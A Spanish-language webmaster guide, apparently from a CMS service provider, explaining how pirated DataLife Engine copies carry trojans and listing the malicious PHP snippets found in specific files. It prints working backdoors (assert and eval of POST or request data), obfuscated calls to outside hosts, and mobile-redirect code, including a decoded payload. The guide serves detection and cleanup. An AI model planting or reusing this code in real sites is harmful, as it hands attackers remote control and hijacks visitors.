Dedicado a los fanáticos de las versiones gratuitas pirateadas de DLE. Cuando descargue CMS DLE en recursos de terceros, prepárese para el hecho de que un caballo de Troya ya está sentado en su sistema, esperando que cree su proyecto y obtenga acceso a él (en el mejor de los casos). En el peor de los casos, eliminará todo o realizará redireccionamientos secretos a otros sitios (generalmente redireccionamientos móviles de sitios en DLE, ya que el administrador no los detecta en el 90% de los casos, porque él mismo se sienta desde una PC o tableta).
Entonces, ¿cómo entender que su sistema DLE tiene un virus con una redirección de versión móvil?
Una de las opciones: empezaste a perder asistencia. Tan pronto como note esto, le recomendamos que preste atención a las instrucciones para detectar código malicioso a continuación para excluir la posibilidad de piratería o infección del sitio.
Otra opción es cuando el propio motor de búsqueda te notifica que hay código no deseado en tu sitio.
Nos gustaría llamar su atención sobre el hecho de que el código malicioso puede estar en casi todos los tipos de archivos del motor: .php, .js, .lng, htaccess e incluso imágenes (a menudo avatares de usuarios). Dicho código puede tener cualquier forma, puede cifrarse con base64_encode, usar char y todo tipo de trucos que dificultan la detección rápida mediante la búsqueda automática a través de él. O puede ser banal estar al aire libre (casos raros).
Tenga en cuenta que a menudo es bastante difícil borrar archivos (sin saber qué está fuera de lugar o es superfluo en el código del motor). Es mejor usar programas para la comparación de códigos, por ejemplo, si, sin embargo, se decidió y compró una licencia del desarrollador DLE, puede verificar el código de la versión con licencia del motor y el suyo usando la verificación de paquetes con el programa WinMerge o Beyond Compare. Para que pueda encontrar la diferencia en el código y encontrar su virus.
Por supuesto, esto solo ayudará si no ha modificado su motor con módulos de terceros o complementos usados. Y definitivamente no ayudará si el código malicioso está en los avatares de los usuarios.
Para encontrar avatares de usuarios de troyanos, instale el antivirus Virusdie en su servidor y encontrará imágenes que no son de ellos.
Si ha sido notificado o usted mismo ha notado que su sitio tarda mucho en cargar, redirige a algún lado, o el antivirus / motor de búsqueda comienza a maldecir su recurso, para empezar, solo vaya a su alojamiento y mire la fecha de modificación del archivo. Si nota que los archivos han cambiado recientemente, a menudo es /index.php, /engine/data/dbconfig.php, /engine/data/config.php, /htaccess, /language/Spanish/website.lng, que en principio, no deberían cambiar, o cambian solo cuando actualiza o instala algo, entonces con una alta probabilidad podemos complacerlo: el sitio está infectado.
No olvide también que el sitio puede tardar mucho en cargarse porque tiene un alojamiento débil, la plantilla está repleta de scripts y no está optimizada, y varias razones similares. Pero es mejor estar seguro, ¿no?
Código malicioso en la mayoría de los motores descargados de sitios de terceros
Le recomendamos que busque no por coincidencia total, sino por parcial.
engine/inc/addnews.php- presencia de código malicioso
$serv = $_SERVER[HTTP_HOST];if (($serv != 'localhost') and ($serv != '127.0.0.1') and (strpos($serv, '.') != false))
{$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."13."."1_".$serv;};
$fi = 'fi'.'le';$up_times = trim(@implode ('', @$fi($serv_time)));
engine/classes/antivirus.class.php: excluyó el archivo que no debería estar allí, ya que resultó que este archivo es una vulnerabilidad
"./engine/classes/min/lib/JSMinify.php",
engine/clases/min/htaccess : la presencia de excepciones que abren el camino para un archivo con una vulnerabilidad
<Files "JSMinify.php">
Order Deny,Allow
Allow from all
</files>
<Files "JSMin.php">
Order Deny,Allow
Allow from all
</files>
engine/classes/min/lib/JSMinify.php: un archivo malicioso que no está incluido en la distribución del sistema y no forma parte de los complementos
engine/modules/calendar.php: la presencia de código malicioso
$reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];
$recaptcha_get_signup_id = 'eb516e7d7a6462a6d531ec65dcf1d599';
$setel = 'a'.'sse'.'rt';if(md5($reg_data)==$recaptcha_get_signup_id) {@$setel(stripslashes($reg_base));}
engine/modules/feedback.php- presencia de código malicioso
$syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;
$sert = $_SERVER[HTTP_HOST];if (($sert != 'localhost') and ($sert != '127.0.0.1') and (strpos($sert, '.') != false))
{$capt = 'f'.'ile';@$capt($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTEzLjFf').$sert);}
engine/módulos/funciones.php- presencia de código malicioso
$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils
$news_num = @$_REQUEST['numer'];
$bannermass = @$_REQUEST['bannerid'];
$check_newsnum = @$_REQUEST['newsnum'];
$check_category = @$_REQUEST['category'];
$get_url_var = '77067560';
$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils
if($bannermass==$get_url_var){
if (@strpos($check_newsnum, 'creat')=== false){
@$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes($check_category) => 2), @$check_newsnum);}else{
@$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes('}'.$check_category.'//') => 2), @$check_newsnum);}}//chekings
Código malicioso, que puede ser opcional (en caso de piratería)
engine/data/dbconfig.php
$liciens = "Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eNqlVG1v2jAQ/itFQnWiskAhvBVF21qhrdq0bpSumlpkOcmReJA4s51SNPPfdw5oXSvKl32Iz76753zP+XL1UEJAKDnyCFWgrFRc5NXZLjwmIz53uFKgnTq9uLr6dDm+qyNq5rq/36E2EmLBwbGqxnOHk9OG5hk47smgO+z2G6RJ3NEGo70IFARk2Pb7Lb/fJ66Qr1g7/cFB6/CQddAie9IlPX/YbvmDbq8z7Pq4DIadVnfg9/xBZ+iTPdnXJcyDOr0eT76PJ3dKSwkPDgotyqIA6RAuS6oVlL9A4o2zUT0V6iBAK5HSQut06y4Ph5eACYB8AqTAYjTsXEnnLU8ir8i0fbum4qlu2t0igjSqVFHkWZlIYcWbzqrSNs+KCqHTo7Nc8GrLKoD4TFwUxwqEtGekj0KyVSmXkEcixlLKeeVSMMky0CCD+/oC1ishY4ThQcFxKYNTxO1hFPxL6Rg5vYhOUq2Ls6alYWuJK7q77ggeuR5t6qVKDpc3h4RRCar8jyLblq39RZCP0+lXeoMn+v7D+MuUzLaN96oZu7DqzVohIaEZ01HqkCayXIK57VxQM15qdpmb2wS0CRmPSxNhAQxnlMkoNSwVwvAkY+YHO5diZVgew6MRIsEAodDmHL+CYx8YloWoyxhfek1OGrY8LjY+Enh2t1h4sjQPCy8S2zDeNqa3he7iSFNqL1xvrxZxLhYmU7kXGZXxtpFh5JlyKRIzZxGEwjMKqnTXNl/PhDxPtklgf1QpPM/hZzsDs85CznKTx1Lw2GQ8LgxIDur+qNcyCq1CmVRH1IiQW2I856bwQiyCwvSKVOTwxBMpOLUXk4rES6AlOlOcZLP9PrtpZk1PrzgZf7sZX0/pzeSSzGrBkf3990yQ3fDp7xsWm83mD0qjwnU=')));";$release_this = "cre"."ate_"."function";$dle_func = $release_this('', "$liciens;");$dle_func('');
Después de descifrar este código, puede ver lo siguiente:
$bre = '_' . '_ses' . 'sion' . '_' . 'id';
if (isset($_COOKIE[$bre])) {
@setcookie($bre, $_COOKIE[$bre] + 1, time() + 85957, '/');
}
if (($_COOKIE[$bre] == '92470477') or ($_COOKIE[$bre] == '92470378') or ($_COOKIE[$bre] == '92470379') or ($_COOKIE[$bre] == '92470380')) {
@setcookie($bre, '64920485639546398930584648394', time() + 85957, '/');
$ref = $_SERVER[strrev(strtoupper('iru_tseuqer')) ];
$hos = $_SERVER[strrev(strtoupper('tsoh_ptth')) ];
$rf = $_SERVER[strrev(strtoupper('rerefer_ptth')) ];
header(strrev('3?igc.pmt' . '/siht/' . 'kcehc' . '/cc.' . 'gro' . '-3w' . '//:pt' . 'th :noi' . 'tac' . 'oL') . '&seor' . 'ef=' . rawurlencode($rf) . '¶meter=$keyword&se=$se&ur=1' . strrev(strtoupper('=rerefer_ptth&')) . rawurlencode('http://' . $hos . $ref));
exit;
}
$usg = $_SERVER[strrev(strtoupper('tnega_resu_ptth')) ];
$rf = $_SERVER[strrev(strtoupper('rerefer_ptth')) ];
if ((!$_SERVER['HTTP_USER_AGENT']) or ($_SERVER['HTTP_USER_AGENT'] == '') or (!preg_match('/rawle|W3C_|EltaIn|Wget|baidu|curl|ia_arch|ahoo|igma|YaBrow|andex|oogle|bot|Bot|pider|amble|mail./i', $usg))) {
if (preg_match('/ok.ru|vk.co|oogle.|andex.|mail.r|ambler|ut.by|igma|odnok|msn.c|smi2|rbc.|ulog|facebo.|search|yahoo.|bing./i', $rf)) {
if ((preg_match('/j2me|ymbian|ndroid|midp|eries 60|symbos|htc_|obile|mini|p.browser|phone/i', $usg)) and (!isset($_COOKIE['dle_user_id'])) and (!isset($_COOKIE[$bre])) and ($_SERVER['REQUEST_URI'] != '/')) {
@setcookie($bre, '92470377', time() + 85957, '/');
}
}
}
A partir de este código, puede ver que solo funciona en dispositivos móviles y solo una vez, luego se escribe en cookies para el usuario y no se vuelve a mostrar. Por lo tanto, muchos pueden pensar que fue un problema técnico. Bueno, el script en sí mismo redirige a los usuarios de dispositivos móviles al sitio web w3-org Que, a su vez, es utilizado por los atacantes como un sitio de colocación y redirige al usuario a cualquier otra dirección final.
index.php
if(preg_match('/'.'('.'a'.'n'.'d'.'r'.'o'.'i'.'d'.'|'.'m'.'i'.'d'.'p'.'|'.'j'.'2'.'m'.'e'.'|'.'s'.'y'.'m'.'b'.'i'.'a'.'n'.'|'.'s'.'e'.'r'.'i'.'e'.'s'.' '.'6'.'0'.'|'.'s'.'y'.'m'.'b'.'o'.'s'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'m'.'o'.'b'.'i'.'l'.'e'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'c'.'e'.'|'.'p'.'p'.'c'.'|'.'s'.'m'.'a'.'r'.'t'.'p'.'h'.'o'.'n'.'e'.'|'.'b'.'l'.'a'.'c'.'k'.'b'.'e'.'r'.'r'.'y'.'|'.'m'.'t'.'k'.'|'.'b'.'a'.'d'.'a'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'p'.'h'.'o'.'n'.'e'.')'.'/'.'i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m"] != '5df9974cf25d22eb3c5aa962d6460477')
{
@setcookie('m', '5df9974cf25d22eb3c5aa962d6460477', time()+86400, '/');
@header("Location: "."h"."t"."t"."p".":"."/"."/"."p"."i"."d"."d"."."."b"."o"."t"."."."n"."u"."/"."s"."/"."1"."1"."8"."0"."5");
die();
}
index.php, engine/modules/config.php, engine/modules/dbconfig.php
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://yadirect.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
engine/data/dbconfig.php
$config['description'].='" />'."
".'<script type="text/jаvascript" src="http://up.bot.nu/go/'.rand(0,999).'"></script>'."
".'<meta http-equiv="Pragma" content="no-cache';
htaccess en el directorio raíz, por motivo de seguridad este código no me deja mostrárselo en el post. Ver archivo en Google drive
Para verificar la eliminación del virus de todos los archivos en el sistema, debe ir a su sitio desde un dispositivo móvil con cualquier sistema operativo (ios, android, etc.), si no hay una redirección a un recurso de terceros del atacante, entonces todo está bien.
Sitios que a menudo se redirigen a versiones móviles de DLE:
w3-org
statuses.ws
live-internet.ws
getinternet.ws
livecountall.ws
googlecount.ws
Utilice siempre copias con licencia del DLE y vigile el sitio.
Si ya ha encontrado algún tipo de error, pero no ayuda, puede pedir ayuda a su técnico para resolver el problema, o a nosotros, te cobramos una tarifa bastante económica.
Comentarios